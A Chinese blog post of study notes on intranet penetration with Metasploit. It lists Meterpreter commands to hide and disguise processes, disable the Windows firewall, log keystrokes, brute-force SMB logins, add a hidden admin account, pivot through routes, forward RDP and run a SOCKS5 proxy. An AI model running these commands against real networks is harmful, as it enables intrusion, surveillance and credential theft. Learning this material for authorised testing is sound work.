记录内网渗透学习进程--DAY4

进程伪装
我们有一个提权exp 但是进程不免杀 这个时候就需要伪装

execute -ffile [Options]
execute -f cmd.exe -i#执⾏cmd.exe命令并进⾏交互
execute -f cmd.exe -i -t#以所有可⽤令牌来执⾏cmd命令
execute -f cmd.exe -i -H -t#创建新进程cmd.exe,-H不可见,-i交互
execute -H -i -f cmd.exe
execute -H -m -d notepad.exe-f wce.exe -a -o wce.txt
运⾏后它将执⾏file参数所指定的⽂件。可选参数如下:
-H:创建⼀个隐藏进程
-a:传递给命令的参数
-i:跟进程进⾏交互
-m:从内存中执⾏
-t:使⽤当前伪造的线程令牌运⾏进程
-s:在给定会话中执⾏进程
-f 执⾏的程序⽂件
-d 在⽬标主机执⾏时显⽰的进程名称(⽤以伪装)
-o wce.txt是wce.exe
 
execute -H(隐藏) -m(加载到内存,从本地加载,如果写了这个,后面 -f 的地址就要写MSF服务器上的) -d(需要隐藏成的进程) notepad.exe -f(要隐藏的进程) c:/users/123/desktop/bind_x64_4445__.exe
getsystem命令 获得的SYSTEM权限无法伪装
关闭防火墙:netsh advfirewall set currentprofile state off   //需要管理员权限
 
比如我执行一个cmd 然后进行伪装 隐藏之后直接交互,我能执行它的shell
 
目标进程里就会在运行
 
一些操作:
keyscan_start 开启键盘记录
keyscan_dump 读取键盘记录

screenshot  屏幕截图

一些linux指令都有 比如cd ls mkdir等
getwd 查看当前路径
upload /root/xx.php c:/xx.php  上传文件
download c:/xx.php 下载文件

editor c:/xx.php  编辑文件

各类终端语言
help 帮助
load python
python_execute

load powershell等
 
 
 
添加路由 端口扫描
让我们可以直接对无目标内网机器进行攻击
MSF跳板实现过程:

         1   需要获得一个msf的session会话;

         2   获取内网地址网段;

         3   在msf中添加”内网网段“的路由;

假设现在获取了一台meterperter 的shell
先观察一些基本信息
getuid

1.获取网段 找到内网网段
三种方式:
shell --> ipconfig
run get_local_subnet
route list(查看路由表)

2.添加路由
run autoroute
backgroup --> route add 添加路由表

route add 192.168.0.0(网段) 255.255.255.0(掩码) 1(session id)
route print打印路由表(攻击机器的)
run autoroute -p 打印路由表

route remove 删除

如果目标防护不严可以使用 arp_scanner -r 在实战中要慎重使用arp协议 极易引起目标防护设备注意!

3.端口扫描
background 放入后台
search portscan 查看端口扫描帮助
use 编号
show options 查看参数
exploit

 
 实操:
1.arp可以看一些通信的信息
 
2.看看路由表
 
3.可以观察到内网网段是10.10.10.1这里,我们添加该网段的路由表信息
 
4.查看一下添加的路由表
 
5.查看一下端口扫描的命令
 
6.这里我们用一下tcp扫描,设置参数,基本操作,执行
 
7.可以看到扫描内网的端口信息啦 wuhu
 
 
 
 
连接数据库

不连接数据库的话,爆破得到的一些数据不存在数据库里,在主机探测时发现一些机器也不存在数据库里
就是信息收集的成果保存在数据库里,要不然一关就没了,当然你能及时处理数据的话不用也可以
安装postgresql
apt-get install postgresql -y

配置postgresql
安装后会在系统新建一个postgres用户
echo "postgres:postgreps123" | chpasswd  //改系统用户密码
修改该postgresql数据库默认用户的密码
su postgres //先切换用户
psql //连接数据库
\password postgres //修改密码,万一被溯源的爆破到就不好了
\q //退出
exit //返回到root

在MSF里连接数据库
db_connect postgres:password@127.0.0.1/msf5(数据库名,随意)
creds 查看数据库记录
 
然后你在MSF上的所有操作输出都能存在数据库里,creads 查看数据
 
 
 
SSH爆破+远程命令执行

假设目前机器和内网在同一网段上
1.先扫描 auxiliary/scanner/portscan/tcp
2.auxiliary/scanner/smb/smb_login  爆破smb

##单用户的情况
set smbuser admin
set smbpass admin  //一般放字典
set rhosts file:/root/x.dic
set threads 2
exploit
set userpass_file //密码字典
set user_file  //账号字典

实战中爆破不会很快!! 可能一秒一次可能其他   端口转发速度可能会比较快

search psexec 远程命令执行  其实感觉直接ssh连接就好
use 1
set command whoami
set rohosts IP
set smbuser admin
set smbpass 123456
exploit
 
 
MSF的端口转发
1.添加账号密码
shell --> net user admin password /add
shell --> net localgroup administartors test /add
 
2.转发
portfwd add -l 33889(转发成的端口) -p 3389(要转发的端口) -r 10.10.10.2(目标IP) 

实操:
1.先拿到交换机的shell,确认内网主机后,转发内网机器的3389 到 通外网的MSF服务器上的 6666端口
 
2.用本机可以直接连接MSF服务器的6666端口

 

 

3.成功远控内网服务器

 

 

 

Socks5反向代理

采用socks5协议的代理服务器就是socks服务器,是一种通用的代理服务器。socks是个电路级的底层网关一直作为Internet RFC标准的开放标准。socks不要求应用程序遵循特定的操作系统平台,socks代理与应用层代理,HTTP层代理不同,Socks代理只是简单得传递数据包,而不必关心是何种应用协议(如FTP,HTTP.NNTP)所以,Socks代理比其他应用层代理要快得多

SOCKS代理不持支持 ARP ICMP 协议

Socks4a代理
支持的协议少一点

 

应用场景
目标内网有多台服务器,网速较好(差不多就得了),想要便捷访问目标任意服务

MSF操作

search socks
use 2show options
set SRVHOST 127.0.01  //设置服务器地址,如果是正向连接的话要写目标地址,如果填0.0.0.0的话,代表谁都可以使用这个服务器,127.0.0.1只能自己用
set SRVPORT 10808    //给服务器一个端口

set username 123 //给服务器一个账号

set password 123  //密码

 

 


show advanced //高级设置
exploit

添加路由 任意方法
run autoroute -s 网段

设置完后要重启一下服务器

先用kill id 杀掉 jobs里面的服务器进程,然后再启动  (这里就是kill 7)

 

 

route add 192.168.0.0(网段) 255.255.255.0(掩码) 1(session id)

-------------以上是搭建服务器---------------

使用的话我们需要下载一个 proxychains (apt下载即可,如果是ubantu的话)

vi /etc/proxychains.conf  //写配置文件

配置文件的最后最后一行修改 IP 端口 账号密码

 

 

接着直接使用工具

proxychains

proxychains curl http://10.10.10.2    //去访问一下内网看是否可行

成功访问

 

 

 

 

 

posted @ 2021-04-16 21:27  paku  阅读(155)  评论(0编辑  收藏  举报